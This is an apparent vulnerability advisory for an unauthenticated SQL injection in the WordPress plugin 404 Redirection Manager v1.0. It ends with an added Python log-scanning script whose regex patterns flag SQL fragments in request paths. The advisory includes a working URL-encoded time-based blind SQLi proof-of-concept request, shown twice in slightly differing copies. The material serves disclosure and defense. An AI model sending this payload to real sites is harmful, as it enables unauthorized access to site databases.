Vendor: 404 Redirection Manager
By: Ahmed Sherif (Deloitte)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: 404 Redirection Manager
Affected Version From: V1.0
Affected Version To: V1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:404_redirection_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Mint
2016

Unauthenticated SQL injection in 404 plugin for WordPress v1.0

The plugin does not properly sanitize the user input. Hence, it was vulnerable to SQL injection.

The vulnerable page is: custom/lib/cf.SR_redirect_manager.class.php on line 356.

Proof of Concept (PoC):

GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp-settings-time-1=1480877693
Connection: close

Mitigation:

Sanitize user input properly

Exploit-DB raw data:

# Exploit Title: Unauthenticated SQL injection in 404 plugin for WordPress v1.0
# Google Dork: N/A
# Date: 17/12/2016
# Exploit Author: Ahmed Sherif (Deloitte)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/404-redirection-manager/
# Version: V1.0
# Tested on: Linux Mint
# CVE : N/A


The plugin does not properly sanitize the user input. Hence, it was
vulnerable to SQL injection.

The vulnerable page is : custom/lib/cf.SR_redirect_manager.class.php on line 356

[#] Proof of Concept (PoC):


GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp-settings-time-1=1480877693
Connection: close
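
The entry lists no patch, and the injection point in the PoC is the request path itself rather than a query parameter, so rules that inspect only query strings will not see it. The following is an added detection example, not part of the original advisory or the plugin: it URL-decodes the path of each access-log request and flags SQL fragments. The log format (combined), the sample lines, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# SQL fragments that should never appear in a decoded URL path (heuristic).
PATH_SQLI_RE = re.compile(r"""
    \b(?:sleep|benchmark|pg_sleep)\s*\(    # time-delay function call
  | \(\s*select\b                          # subquery
  | ['"]\s*\)?\s*(?:and|or)\s*[\s('"]      # quote breaking out into AND/OR
""", re.IGNORECASE | re.VERBOSE)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [17/Dec/2016:10:00:01 +0000] "GET /old-page HTTP/1.1" 404 512',
    '198.51.100.9 - - [17/Dec/2016:10:00:02 +0000] "GET /products/select-series/ HTTP/1.1" 200 900',
    '203.0.113.7 - - [17/Dec/2016:10:00:03 +0000] "GET /blog/%27%29%20AND%20%28SELECT%20SLEEP%285%29%29%20AND%20%28%27a%27%3D%27a HTTP/1.1" 404 512',
    '198.51.100.4 - - [17/Dec/2016:10:00:04 +0000] "GET /rock-and-roll/ HTTP/1.1" 404 512',
]

def decode_path(target, rounds=2):
    """Return the path part of a request target, URL-decoded up to `rounds` times."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):          # a second round catches double encoding (%2527)
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def suspicious_requests(lines):
    """Return (client_ip, status, decoded_path) for requests whose path looks like SQLi."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue                 # not a request line we understand
        path = decode_path(m.group("target"))
        if PATH_SQLI_RE.search(path):
            hits.append((line.split()[0], m.group("status"), path))
    return hits

if __name__ == "__main__":
    for ip, status, path in suspicious_requests(SAMPLE_LOG):
        print(ip, status, path)
```

The patterns are a heuristic for triage and will need tuning against a site's legitimate URLs; they do not replace parameterizing the query in the plugin.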